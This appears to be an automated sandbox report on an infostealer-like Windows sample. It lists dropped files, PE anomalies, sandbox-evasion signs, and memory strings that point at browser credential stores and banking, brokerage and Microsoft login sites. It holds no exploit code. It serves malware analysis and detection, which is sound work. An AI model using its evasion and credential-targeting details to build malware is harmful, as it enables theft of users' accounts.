Source:	Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cs source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbloaded source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State^;:}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ]C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini^ source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbt\| source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbaK source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Temp source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: dC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\al State source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ticsnp3} source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State>pC}d source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: YC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb981804 source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ]\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9mauyKC3JW.exe

Code function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

0_2_00406D5D

Source: yhg.4.dr	Static PE information: real checksum: 0x27e49f should be: 0x27db64
Source: 9mauyKC3JW.exe	Static PE information: real checksum: 0x33302 should be: 0x8b3f1a
Source: iepdf32.dll.2.dr	Static PE information: real checksum: 0x460121 should be: 0x4572ac
Source: cvnmq.16.dr	Static PE information: real checksum: 0x27e49f should be: 0x27db64
Source: iepdf32.dll.0.dr	Static PE information: real checksum: 0x460121 should be: 0x4572ac

Source: hv.exe.0.dr	Static PE information: section name: .didata
Source: iepdf32.dll.0.dr	Static PE information: section name: .00cfg
Source: iepdf32.dll.0.dr	Static PE information: section name: malloc_h
Source: hv.exe.2.dr	Static PE information: section name: .didata
Source: iepdf32.dll.2.dr	Static PE information: section name: .00cfg
Source: iepdf32.dll.2.dr	Static PE information: section name: malloc_h
Source: Localdockerv3.exe.4.dr	Static PE information: section name: Shared
Source: yhg.4.dr	Static PE information: section name: .xdata
Source: yhg.4.dr	Static PE information: section name: sii
Source: cvnmq.16.dr	Static PE information: section name: .xdata
Source: cvnmq.16.dr	Static PE information: section name: sii

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_00411C20 push eax; ret	0_2_00411C4E
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Code function: 2_2_6CD2C57B push ecx; ret	2_2_6CD2C58E
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001282D push 8B480014h; retf	8_2_0000000140012832
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_000000014001D949 push rsp; ret	8_2_000000014001D94B
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140013D4C pushfq ; ret	8_2_0000000140013D4D
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140013DE5 pushfq ; ret	8_2_0000000140013DE6
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Code function: 8_2_0000000140013F26 pushfq ; ret	8_2_0000000140013F27

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cvnmq	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hv.exe	File created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\yhg	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hv.exe	File created: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	File created: C:\Users\user\AppData\Local\Temp\hv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	File created: C:\Users\user\AppData\Local\Temp\iepdf32.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\yhg			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\cvnmq			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YHG
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CVNMQ

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Temp\hv.exe	API/Special instruction interceptor: Address: 6C7E7C44
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	API/Special instruction interceptor: Address: 6C7E7C44
Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe	API/Special instruction interceptor: Address: 6C7E7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C7E3B54

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cvnmq	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yhg	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hv.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iepdf32.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\hv.exe

API coverage: 3.4 %

Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 2772	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 6588	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 636	Thread sleep time: -62139s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 6676	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,		0_2_0040301A
Source: C:\Users\user\Desktop\9mauyKC3JW.exe	Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,		0_2_00402B79

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\

Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1897543523.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160225088.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWq
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: Localdockerv3.exe, 00000008.00000003.1897543523.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160225088.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Localdockerv3.exe, 00000008.00000002.2160225088.00000000004BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
